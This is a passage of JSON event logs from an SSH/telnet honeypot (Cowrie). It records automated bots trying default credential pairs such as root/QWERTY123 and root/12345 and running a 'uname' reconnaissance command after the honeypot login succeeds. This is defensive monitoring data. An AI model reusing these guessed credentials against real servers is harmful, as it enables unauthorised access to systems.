0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:24.225490Z","src_ip":"212.227.125.160","session":"e2eaa7fca34e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:24.875502Z","src_ip":"212.227.125.160","session":"e2eaa7fca34e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:26.093842Z","src_ip":"212.227.125.160","session":"e2eaa7fca34e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53774,"dst_ip":"1.2.3.4","dst_port":22,"session":"09777f6dd030","protocol":"ssh","message":"New connection: 212.227.235.229:53774 (1.2.3.4:22) [session: 09777f6dd030]","sensor":"my-vps","timestamp":"2025-08-28T06:57:30.584644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:30.586341Z","src_ip":"212.227.235.229","session":"09777f6dd030"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:30.832092Z","src_ip":"212.227.235.229","session":"09777f6dd030"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:31.572055Z","src_ip":"212.227.235.229","session":"09777f6dd030"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:32.820965Z","src_ip":"212.227.235.229","session":"09777f6dd030"}
{"eventid":"cowrie.session.closed","duration":30.835259914398193,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.197492Z","src_ip":"8.222.212.69","session":"f79b88a39f4c"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":60618,"dst_ip":"1.2.3.4","dst_port":23,"session":"400724b67d59","protocol":"telnet","message":"New connection: 3.130.96.91:60618 (1.2.3.4:23) [session: 400724b67d59]","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.577395Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.579353Z","src_ip":"3.130.96.91","session":"400724b67d59"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.580413Z","src_ip":"3.130.96.91","session":"400724b67d59"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.581287Z","src_ip":"3.130.96.91","session":"400724b67d59"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":60648,"dst_ip":"1.2.3.4","dst_port":23,"session":"584d3ac91ecb","protocol":"telnet","message":"New connection: 3.130.96.91:60648 (1.2.3.4:23) [session: 584d3ac91ecb]","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.675876Z"}
{"eventid":"cowrie.session.closed","duration":0.13208794593811035,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.709412Z","src_ip":"3.130.96.91","session":"400724b67d59"}
{"eventid":"cowrie.session.closed","duration":0.12894845008850098,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:39.804746Z","src_ip":"3.130.96.91","session":"584d3ac91ecb"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":60654,"dst_ip":"1.2.3.4","dst_port":23,"session":"46ab396215b8","protocol":"telnet","message":"New connection: 3.130.96.91:60654 (1.2.3.4:23) [session: 46ab396215b8]","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.037298Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.090462Z","src_ip":"3.130.96.91","session":"46ab396215b8"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.091428Z","src_ip":"3.130.96.91","session":"46ab396215b8"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.092157Z","src_ip":"3.130.96.91","session":"46ab396215b8"}
{"eventid":"cowrie.session.closed","duration":0.3518862724304199,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.389118Z","src_ip":"3.130.96.91","session":"46ab396215b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35740,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6772762d1a9","protocol":"ssh","message":"New connection: 212.227.125.160:35740 (1.2.3.4:22) [session: a6772762d1a9]","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.451757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.452682Z","src_ip":"212.227.125.160","session":"a6772762d1a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:40.664321Z","src_ip":"212.227.125.160","session":"a6772762d1a9"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:41.304598Z","src_ip":"212.227.125.160","session":"a6772762d1a9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:42.518787Z","src_ip":"212.227.125.160","session":"a6772762d1a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58344,"dst_ip":"1.2.3.4","dst_port":22,"session":"779ef1d8d9ab","protocol":"ssh","message":"New connection: 212.227.235.229:58344 (1.2.3.4:22) [session: 779ef1d8d9ab]","sensor":"my-vps","timestamp":"2025-08-28T06:57:47.235460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:47.236344Z","src_ip":"212.227.235.229","session":"779ef1d8d9ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:47.479652Z","src_ip":"212.227.235.229","session":"779ef1d8d9ab"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:48.212212Z","src_ip":"212.227.235.229","session":"779ef1d8d9ab"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:49.459408Z","src_ip":"212.227.235.229","session":"779ef1d8d9ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36696,"dst_ip":"1.2.3.4","dst_port":22,"session":"5caff098851a","protocol":"ssh","message":"New connection: 212.227.125.160:36696 (1.2.3.4:22) [session: 5caff098851a]","sensor":"my-vps","timestamp":"2025-08-28T06:57:57.063878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:57.064779Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:57.291966Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:57:57.972895Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:57:58.518311Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:57:58.519281Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:58.743288Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:58.744443Z","src_ip":"212.227.125.160","session":"5caff098851a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33836,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2ab781275cc","protocol":"ssh","message":"New connection: 212.227.235.229:33836 (1.2.3.4:22) [session: b2ab781275cc]","sensor":"my-vps","timestamp":"2025-08-28T06:58:03.786739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:03.788188Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:04.037717Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:58:04.787041Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:58:05.305273Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:58:05.306115Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:05.560504Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:05.561764Z","src_ip":"212.227.235.229","session":"b2ab781275cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39800,"dst_ip":"1.2.3.4","dst_port":22,"session":"5240721f94ac","protocol":"ssh","message":"New connection: 212.227.125.160:39800 (1.2.3.4:22) [session: 5240721f94ac]","sensor":"my-vps","timestamp":"2025-08-28T06:58:13.610420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:13.616400Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:13.840027Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:58:14.670259Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:58:15.174922Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:58:15.175599Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:15.388882Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:15.389932Z","src_ip":"212.227.125.160","session":"5240721f94ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55604,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c715ed92d95","protocol":"ssh","message":"New connection: 212.227.235.229:55604 (1.2.3.4:22) [session: 5c715ed92d95]","sensor":"my-vps","timestamp":"2025-08-28T06:58:20.144872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:20.145780Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:58:20.400627Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:58:21.169439Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:58:21.775008Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:58:21.775857Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:22.035487Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:58:22.036626Z","src_ip":"212.227.235.229","session":"5c715ed92d95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52164,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab67a64ef4f","protocol":"ssh","message":"New connection: 212.227.125.160:52164 (1.2.3.4:22) [session: 9ab67a64ef4f]","sensor":"my-vps","timestamp":"2025-08-28T06:58:30.074134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:58:30.075326Z","src_ip":"212.227.125.160","session":"9ab67a64ef4f"}
